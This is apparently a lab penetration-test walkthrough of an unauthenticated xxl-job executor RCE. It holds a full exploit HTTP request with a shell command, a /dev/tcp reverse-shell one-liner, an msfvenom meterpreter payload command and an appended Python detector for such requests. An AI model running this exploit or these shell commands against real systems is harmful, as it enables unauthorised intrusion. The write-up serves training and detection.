A walkthrough of one lab range assessment

This post is a lab range penetration test set by a colleague at my former employer one month. It is all routine operations, which makes it very suitable for practice to build up basic proficiency.

Directory scanning found:

Visiting it produced an error message:

From the Java package names in the error, the source code can be located; here I asked ChatGPT:

Googling turned up the documentation, and from there the admin backend:

http://192.168.10.70:8080/xxl-job-admin/toLogin

After reading through it, I found there is an unauthenticated RCE. The newest one (SSRF into the backend, then RCE) I could not get working; this is the older one:

POST /run HTTP/1.1
Host: 192.168.10.70:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 521

{
  "jobId":1,
  "executorHandler":"demoJobHandler",
  "executorParams":"demoJobHandler",
  "executorBlockStrategy":"COVER_EARLY",
  "executorTimeout":0,
  "logId":1,
  "logDateTime":1586629003729,
  "glueType":"GLUE_SHELL",
  "glueSource":"ping ecujz4ok5rcfvx3kdd5turf0rrxil89x.oastify.com",
  "glueUpdatetime":1586629003727,
  "broadcastIndex":0,
  "broadcastTotal":0
}

The DNS lookup was triggered successfully:

Next comes the reverse shell:

/bin/bash -i >& /dev/tcp/192.168.11.108/8888 0>&1

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.11.108 LPORT=443 -f elf -o reverse.elf

To keep the session alive, bring it into msf:...
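Added here as a defender-side example (not from the original post or from the xxl-job project): a small checker that flags executor /run requests of the shape shown above when they carry no access token or push an interpreted script job instead of a registered bean handler. The header name XXL-JOB-ACCESS-TOKEN and the glue type names are assumed from xxl-job; the two sample requests are constructed, not captured from the lab.

```python
import json
from typing import Optional

# Assumed header name used by xxl-job to carry the executor access token.
ACCESS_TOKEN_HEADER = "xxl-job-access-token"
# xxl-job glue types that run interpreted script rather than a registered bean.
SCRIPT_GLUE_TYPES = {"GLUE_GROOVY", "GLUE_SHELL", "GLUE_PYTHON",
                     "GLUE_PHP", "GLUE_NODEJS", "GLUE_POWERSHELL"}


def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return method, path, headers, body


def classify_run_request(raw: str) -> Optional[str]:
    """Return a finding for a suspicious executor /run request, or None if it looks normal."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path.split("?")[0].rstrip("/") != "/run":
        return None
    try:
        job = json.loads(body)
    except json.JSONDecodeError:
        return "unparseable /run body"
    findings = []
    if ACCESS_TOKEN_HEADER not in headers:
        findings.append("no access token")
    glue = job.get("glueType")
    if glue in SCRIPT_GLUE_TYPES:
        findings.append(f"script job via {glue}")
    return "; ".join(findings) or None


# Constructed sample traffic (not captured from the lab): one token-less shell job
# shaped like the request above, and one authenticated bean job for comparison.
SAMPLE_SHELL_JOB = (
    "POST /run HTTP/1.1\r\nHost: executor.example:9999\r\nConnection: close\r\n\r\n"
    + json.dumps({"jobId": 1, "glueType": "GLUE_SHELL",
                  "glueSource": "ping callback.example"})
)
SAMPLE_BEAN_JOB = (
    "POST /run HTTP/1.1\r\nHost: executor.example:9999\r\n"
    "XXL-JOB-ACCESS-TOKEN: placeholder-token\r\n\r\n"
    + json.dumps({"jobId": 2, "glueType": "BEAN", "executorHandler": "demoJobHandler"})
)
```

Run over executor access logs or a proxy capture, a hit on "no access token" means the executor is reachable without xxl.job.accessToken configured, which is the condition the request above relies on.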